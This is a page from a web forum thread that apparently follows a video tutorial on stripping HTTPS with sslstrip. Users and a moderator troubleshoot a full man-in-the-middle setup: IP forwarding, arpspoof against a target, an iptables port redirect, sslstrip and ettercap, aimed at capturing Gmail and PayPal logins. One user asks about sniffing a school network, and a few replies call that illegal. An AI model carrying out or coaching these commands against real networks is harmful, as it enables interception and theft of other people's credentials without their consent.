Page 4 of 8 FirstFirst ... 23456 ... LastLast
Results 31 to 40 of 79

Thread: [Video] How to: Snifff SSL / HTTPS (sslstrip)

  1. #31
    Just burned his ISO
    Join Date
    May 2010
    Posts
    1

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Thanks for all your tutorials and the time your spending 4 it , its all useful best regards

  2. #32
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Quote Originally Posted by ch0k|t0 View Post
    Hello. I don't understand some sitiations.

    Why are you using --destination port 80 if https work on port 443?.
    On my case, change the value in ip_forward is not working; I just can use the forwarding capabilities when use fragrouter but the sniffer don't work, no one decripted data I can get.

    I have tried make the attack on my test room and I can't get it work.

    iptables -t nat A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    What value does this return?
    cat /proc/sys/net/ipv4/ip_forward
    SSLStrip I believe does stuff to the port, and redirects the ports

    Quote Originally Posted by mastodongle View Post
    can this be done with the mon0 interface simply while sniffing the network with airmon-ng or does wlan0 have to actually be connected to the wireless network in order to use arpspoof and sslstrip?
    You need to be connected to the network.
    mon0 = monitor mode. Your not connected.

    Quote Originally Posted by joker5bb View Post
    you need to be on the gateway for the attack
    Yep

    Quote Originally Posted by proisr View Post
    Thank you so much man!
    I didn't know how to bypass the SSL security.

    BTW: I think someone on my net (200+ PCs on the net) tried to sniff my brother's passwords...(firefox blocked it like in your video).

    Is there any way which I can track the attacker / block the attacks?

    edit: I wasn't able to sniff the whole network.
    How can I sniff (with ettercap) range of IPs?
    Because putting 192.168.0.255 didn't work (it's just 1 computer)
    Yes, check the ARP cache - see if there are dups!
    and there are many different tuts on how to use ettercap, this isnt one!

    Quote Originally Posted by nicksiz View Post
    you are perfect m8! and i have a question


    we use cyberoam to enter the internet @ my school. When you connect to school wireless, its redirect you http://192.168.150.1:8090/httpclient.html and you have to enter your username and password to use internet connection..

    1. should i enter my pass and user name to sniff? Or being connected to wireless enough?
    2. when i use ifconfig it says Bcast:192.168.62.255 do i use this instead of 192.168.1.1?
    1.) It depends on how the network/router are setup.
    2.) This is also sounding illegal

    Quote Originally Posted by WolverineOD View Post
    As tempting as it may be to try arpspoofing your school network, You should first realize that its illegal to do without explicit consent from your school (Which i doubt they will give) and that we don't support or condone this kind of activity in these forums. Besides which this will totally kill all the network traffic(because all the traffic is being routed through the attackers pc, downside of arpspoofing) and your system admins will likely notice if they know what they are doing. Its not worth it. Take care mate.

    However if anybody else is confused about this:


    Yes this is the case. If you have a different broadcast address, use it. The addresses given by g0tmi1k are only example addresses, which apply to the network he was using. Addresses will likely be different for your own network. Hope that helps.
    Thanks for the reply!

    Quote Originally Posted by nicksiz View Post
    thanks m8 for your answer. its not illegal because i have doing it with my teacher for his pc only but we didnt done it . thanks 4 your help this forum is perfect
    The teacher doesn't have the permission btw.

    Quote Originally Posted by coolkaveh View Post
    Thanks for all your tutorials and the time your spending 4 it , its all useful best regards
    Thanks for the thanks
    Have you...g0tmi1k?

  3. #33
    Just burned his ISO
    Join Date
    Jun 2010
    Location
    Quezon City, Philippines
    Posts
    3

    Unhappy Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    ahm, guys, i have a question.. when i try to do this tutorial on HTTPS sniffing, google mail didn't redirect..when i logged in, it stays on the form page even if i refresh it. also, paypal returns an unsecured certificate even if i run ssltrip -a -k -f.. help guys..I've done every single thing in this how to.

    Im using Backtrack 4 Live USB.

    Thanks.

  4. #34
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Quote Originally Posted by mamen0330 View Post
    ahm, guys, i have a question.. when i try to do this tutorial on HTTPS sniffing, google mail didn't redirect..when i logged in, it stays on the form page even if i refresh it. also, paypal returns an unsecured certificate even if i run ssltrip -a -k -f.. help guys..I've done every single thing in this how to.

    Im using Backtrack 4 Live USB.

    Thanks.
    Is the targets, ARP' spoof?
    If its windows:
    Start -> run -> cmd -> arp -a
    check that the gateway MAC and the attackers MAC is the same.
    Did you do the port forwarding bit too?
    Have you...g0tmi1k?

  5. #35
    Just burned his ISO
    Join Date
    Jun 2010
    Location
    Quezon City, Philippines
    Posts
    3

    Wink Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Quote Originally Posted by g0tmi1k View Post
    Is the targets, ARP' spoof?
    If its windows:
    Start -> run -> cmd -> arp -a
    check that the gateway MAC and the attackers MAC is the same.
    Did you do the port forwarding bit too?
    Here's the setup:

    Target: 192.168.1.2
    GW: 192.168.1.1 (my subnetmask BTW is 255.255.255.240. will this affect this?)

    ################################################## ###
    nano /etc/etter.conf #I've uncomment the redir_command in iptables for linux ##
    ##
    echo 1 > /proc/sys/net/ipv4/ip_forward #I've setup ip forward ##
    ##
    arpspoof -i eth0 -t 192.168.1.2 192.168.1.1 #my int is eth0 ##

    iptables -t nat -A PREROUTING -p tcp --destination-port 80
    -j REDIRECT --to-ports 10000 #I've set this up for the packets will redirect to sslstrip

    sslstrip -a -k -f # I've run sslstrip with these parameters. ##
    ##
    ettercap -T -q -i eth0 #then lastly I've run ettercap to test it. ##
    ################################################## ###

    that's the whole set of commands that I've used. as I said, I still got certificate error for paypal and
    It's a looping scheme for gmail. I'm not redirected to my mail content.

    Thanks for the help .

  6. #36
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Quote Originally Posted by mamen0330 View Post
    Here's the setup:

    Target: 192.168.1.2
    GW: 192.168.1.1 (my subnetmask BTW is 255.255.255.240. will this affect this?)

    ################################################## ###
    nano /etc/etter.conf #I've uncomment the redir_command in iptables for linux ##
    ##
    echo 1 > /proc/sys/net/ipv4/ip_forward #I've setup ip forward ##
    ##
    arpspoof -i eth0 -t 192.168.1.2 192.168.1.1 #my int is eth0 ##

    iptables -t nat -A PREROUTING -p tcp --destination-port 80
    -j REDIRECT --to-ports 10000 #I've set this up for the packets will redirect to sslstrip

    sslstrip -a -k -f # I've run sslstrip with these parameters. ##
    ##
    ettercap -T -q -i eth0 #then lastly I've run ettercap to test it. ##
    ################################################## ###

    that's the whole set of commands that I've used. as I said, I still got certificate error for paypal and
    It's a looping scheme for gmail. I'm not redirected to my mail content.

    Thanks for the help .
    Looks like you didnt listen to be the first time, so Ill say it again.
    Can you check to see if your target has been ARP spoofed.
    If the target machine is running windows: Start -> run -> cmd -> arp -a
    Check that the gateway MAC and the attackers MAC is the same.

    Nope, the subnet shouldn't make a difference.
    Have you...g0tmi1k?

  7. #37
    Just burned his ISO
    Join Date
    Jun 2010
    Location
    Quezon City, Philippines
    Posts
    3

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Quote Originally Posted by g0tmi1k View Post
    Looks like you didnt listen to be the first time, so Ill say it again.
    Can you check to see if your target has been ARP spoofed.
    If the target machine is running windows: Start -> run -> cmd -> arp -a
    Check that the gateway MAC and the attackers MAC is the same.

    Nope, the subnet shouldn't make a difference.
    Yup. the victim has been arpspoofed. gateway MAC is the same as my eth0 MAC. if i don't run sslstrip, it works fine. but if i run sslstrip, that's where the problem starts.

  8. #38
    Junior Member creepykrawler's Avatar
    Join Date
    Jan 2010
    Location
    USA
    Posts
    56

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    is the ec_uid and ec_gid line in etter.conf = 0 for root? Maybe that will help.
    "Failing to plan is planning to fail"

  9. #39
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    2

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    I am having the same issue. When I click login on the gmail page it just seems to refresh the page. I have verified that I followed all steps and that the gateway mac is the attackers.

    Any ideas?

  10. #40
    Just burned his ISO
    Join Date
    Jun 2010
    Posts
    9

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    I heard from a guy on the #backtrack-linux channel that the "big" companys have fixed this issue by forcing SSL. Its just what he told me when i tryed to fix it.
    I would also like to get this confirmed?

    //zlate

Page 4 of 8 FirstFirst ... 23456 ... LastLast

Similar Threads

  1. Sickness - Password Sniffing with SSLStrip.
    By sickness in forum BackTrack Videos
    Replies: 35
    Last Post: 09-17-2010, 01:16 PM
  2. creating BT4 USB persistent video
    By jimmy in forum Beginners Forum
    Replies: 0
    Last Post: 02-12-2010, 11:45 PM
  3. sslstrip w/ My Wired-Wireless Network
    By MassAppeal in forum Beginners Forum
    Replies: 11
    Last Post: 02-11-2010, 05:56 AM
  4. Video Capture Software
    By sprouty in forum Beginners Forum
    Replies: 4
    Last Post: 01-25-2010, 11:16 AM
  5. sslstrip v0.7
    By Mr-Protocol in forum Tool Requests
    Replies: 2
    Last Post: 01-18-2010, 06:33 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •